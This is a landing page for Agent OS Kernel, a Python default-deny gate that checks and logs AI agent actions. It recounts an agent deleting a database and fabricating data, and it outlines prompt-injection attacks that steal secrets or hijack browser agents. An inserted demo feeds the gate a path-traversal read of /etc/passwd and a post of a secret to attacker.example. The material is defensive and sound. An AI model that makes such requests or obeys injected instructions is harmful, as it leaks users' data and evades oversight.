Agent OS Kernel
v0.4.3 - PyPI package - GitHub

If your AI assistant tries to delete the production database, who stops it?

Agent OS Kernel is a safety gate for AI agents. Every action gets checked first, executed only if allowed, and recorded either way.

- Decision overhead: negligible
- Test coverage: 96%
- Built-in providers: 4
Why this is urgent

AI agents are doing more dangerous things than you think.

A helpful assistant can still be fooled, rushed, or mistaken. The gate is the checkpoint between a suggestion and a real-world action.

One command, entire production database gone

A Replit AI agent deleted a company's production database, wiping executive records and company data, then fabricated replacement data.

Replit / SaaStr incident, July 2025

A hidden message in your inbox steals your secrets

Instructions hidden inside comments, emails, or pages can convince an assistant to send secrets to an attacker-controlled URL.

OWASP LLM01: Prompt Injection

A single web page can hijack a browser agent

A booby-trapped page can tell a browser agent to forward codes, visit a risky endpoint, or take actions the user never asked for.

Brave Browser security research, 2025
Try it yourself

Click once. Watch the gate stop the AI.

Pick a risky situation, press Run, and watch each action move through the safety gate before anything reaches the real world.

Want it for real? Install it (see the Install section below) or open the demo README.

How it works

Three steps, always in the same order.

Think of it like airport security for AI actions: check the rules, let approved actions through, and keep a record of every decision.

1. Check

Match the requested action against the rules you wrote. Is this allowed?

YAML policy match, glob resource patterns, blocked unless explicitly allowed.

2. Execute

If the action is allowed, the gate hands it to the tool that does the real work.

One provider runs the action: filesystem, HTTP, process, or MCP.

3. Record

Whether the action ran or was blocked, one log line is written for later review.

Append-only JSONL with record_id, status, duration, target, and error.
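The three steps above, applied to the prompt-injection scenarios from the "Why this is urgent" section, in working code. This is an added example written for this page, not Agent OS Kernel's own code or API: the policy dict standing in for policy.yaml, the provider.verb action names, the statuses allowed/denied/error, and the hash-chained record layout are all assumptions made for illustration. It also canonicalizes targets before glob matching, a step the page does not discuss, so a path-traversal read or a URL carrying userinfo cannot slip past the allow list.

```python
# Added example, not Agent OS Kernel's code. Policy schema, action names,
# statuses and record fields are assumptions made for illustration.
import fnmatch
import hashlib
import json
import os
import tempfile
import time
from urllib.parse import urlsplit

# Constructed policy (a real gate would load it from policy.yaml). Only allow
# rules exist; a request that matches none of them is denied (default deny).
POLICY = {"allow": [
    {"action": "fs.read",  "target": "/workspace/*"},
    {"action": "http.get", "target": "https://api.example.com/*"},
]}

def normalize(action, target):
    """Canonicalize BEFORE glob matching, or the globs can be dodged:
    fs.*   -> collapse '..', so /workspace/../etc/passwd becomes /etc/passwd
    http.* -> scheme://hostname/path without userinfo or port, so
              https://api.example.com@evil.net/x is matched as https://evil.net/x"""
    if action.startswith("fs."):
        return os.path.normpath(target)
    if action.startswith("http."):
        u = urlsplit(target)
        if u.scheme not in ("http", "https") or not u.hostname:
            return ""                      # unparseable target: matches no rule
        return f"{u.scheme}://{u.hostname.lower()}{u.path or '/'}"
    return target

def check(policy, action, target):
    """Step 1, Check: first matching allow rule wins, otherwise default deny."""
    canon = normalize(action, target)
    for r in policy["allow"]:
        if fnmatch.fnmatchcase(action, r["action"]) and fnmatch.fnmatchcase(canon, r["target"]):
            return True, canon, f"allowed by rule {r['action']} {r['target']}"
    return False, canon, "no allow rule matched (default deny)"

class Gate:
    """submit() is the only way to run an action; providers are never called directly."""
    def __init__(self, policy, providers, log_path):
        self.policy, self.providers, self.log_path = policy, providers, log_path
        self.prev_hash, self.next_id = "0" * 64, 1

    def submit(self, action, target):
        allowed, canon, reason = check(self.policy, action, target)
        status, result, error, t0 = "denied", None, None, time.perf_counter()
        if allowed:
            try:   # Step 2, Execute: exactly one provider, chosen by action prefix.
                result = self.providers[action.split(".")[0]](action, canon)
                status = "allowed"
            except Exception as e:
                status, error = "error", repr(e)
        # Step 3, Record: one line per decision, written whether it ran or not.
        # Each line commits to the previous line's hash, so the chain is checkable.
        rec = {"record_id": self.next_id, "action": action, "target": canon,
               "status": status, "reason": reason, "error": error,
               "duration_ms": round((time.perf_counter() - t0) * 1000, 3),
               "prev_hash": self.prev_hash}
        rec["hash"] = hashlib.sha256(json.dumps(rec, sort_keys=True).encode()).hexdigest()
        with open(self.log_path, "a") as f:    # append only: never truncated or rewritten
            f.write(json.dumps(rec, sort_keys=True) + "\n")
        self.prev_hash, self.next_id = rec["hash"], self.next_id + 1
        return status, result

def verify_log(log_path):
    """Recompute the hash chain: an edited, deleted or reordered line breaks it."""
    prev = "0" * 64
    with open(log_path) as f:
        for n, line in enumerate(f, 1):
            rec = json.loads(line)
            h = rec.pop("hash")
            if rec["record_id"] != n or rec["prev_hash"] != prev:
                return False
            if hashlib.sha256(json.dumps(rec, sort_keys=True).encode()).hexdigest() != h:
                return False
            prev = h
    return True

def make_fs_provider(root):
    """Read-only filesystem provider confined to root: /workspace/x is root/workspace/x."""
    def run(action, target):
        with open(os.path.join(root, target.lstrip("/"))) as f:
            return f.read()
    return run

def http_provider(action, target):
    return f"would {action} {target}"   # stand-in for a real client so this runs offline

def run_demo():
    """Constructed scenario: a legitimate read, a path-traversal attempt, and an
    injected instruction to send data to an attacker-controlled URL."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "workspace"))
        with open(os.path.join(root, "workspace", "data.csv"), "w") as f:
            f.write("id,total\n1,42\n")
        log = os.path.join(root, "kernel.log")
        gate = Gate(POLICY, {"fs": make_fs_provider(root), "http": http_provider}, log)
        results = [
            gate.submit("fs.read", "/workspace/data.csv"),
            gate.submit("fs.read", "/workspace/../etc/passwd"),
            gate.submit("http.get", "https://api.example.com/v1/ping"),
            gate.submit("http.post", "https://attacker.example/collect?v=secret"),
            gate.submit("http.get", "https://api.example.com@evil.net/x"),
        ]
        return [s for s, _ in results], results[0][1], verify_log(log)

if __name__ == "__main__":
    print(run_demo())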
    Watch it run

    A guided replay for people who would rather watch.

    The video is lazy-loaded, narrated, captioned, and safe to watch muted.

    For developers

    Show technical details.

    Three invariants, a five-line example, nine core features, architecture diagram, and benchmarks.

    All access through Gate

    kernel.submit() is the only execution path. ToolDef is metadata-only.

    Default deny

    Actions not explicitly allowed in the YAML policy are blocked. Resource glob patterns keep the policy expressive.

    No silent actions

    Every decision produces one audit record with action, target, status, duration, and error.

    hello_kernel.py
    from agent_os_kernel import Kernel, ActionRequest
    from agent_os_kernel.providers.filesystem import FilesystemProvider
    
    with Kernel("policy.yaml", [FilesystemProvider()], "kernel.log") as kernel:
        ok = kernel.submit(ActionRequest(action="fs.read", target="/workspace/data.csv"))
        denied = kernel.submit(ActionRequest(action="fs.read", target="/etc/passwd"))
    
    print(ok.status, denied.status)
    Agent OS Kernel architecture: AgentLoop to kernel submit to policy, provider, and audit

    Structural Gate

    The public execution path is intentionally small.

    YAML policy

    Allow-list with glob matching and constraints.

    Append-only audit

    Tamper-evident JSONL for each decision.

    One-click rollback

    Snapshot-and-restore for reversible writes.

    4 built-in providers

    Filesystem, process, HTTP, and MCP.

    100+ LLM providers

    LiteLLM routing for OpenAI, Anthropic, Ollama, Azure, and more.

    CLI

    submit · log · validate-policy · version

    High throughput

    77,000+ ops/s. p99 < 0.1 ms.

    Auditable core

    Small enough to read end to end.

    Install

    One pip away.

    Not a coder, just looking around? The Try It section above does it without installing anything.

    Want to wire it into your own project? Python 3.10+. Zero runtime dependencies in the kernel core. Works with any LiteLLM-compatible provider.

    pip
    pip install py-agent-kernel
    uv
    uv add py-agent-kernel
    from source
    git clone https://github.com/JiahaoZhang-Public/agent-kernel.git
    cd agent-kernel && pip install -e .